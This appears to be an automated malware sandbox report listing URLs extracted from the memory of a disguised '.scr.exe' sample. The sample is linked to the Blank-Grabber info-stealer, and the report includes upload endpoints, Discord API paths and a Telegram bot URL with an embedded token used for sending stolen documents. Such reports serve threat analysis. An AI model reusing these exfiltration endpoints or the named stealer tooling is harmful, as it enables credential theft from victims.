00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoftILEEX~1.LNKy./
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoftISPLA~1.PNGy.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoftRUSTT~2JSOy./
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.anonfiles.com/upload
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.gofile.io/getServer
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88234000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329477529.0000028C87C6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/v9/users/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060606390.0000028C87391000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2059021822.0000028C87D20000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058548042.0000028C87CE6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058318262.0000028C87E4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C8724C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060852882.0000028C877E6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2061237289.0000028C87680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920px
Source: powershell.exe, 00000029.00000002.2158201728.0000015300C35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2286012485.000001619A462000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.micros
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2127743261.0000028C87B3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com/generate_204
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060431464.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json.org
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C8828C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053300423.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057343585.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057514542.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053108442.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0205/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://peps.python.org/pep-0263/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
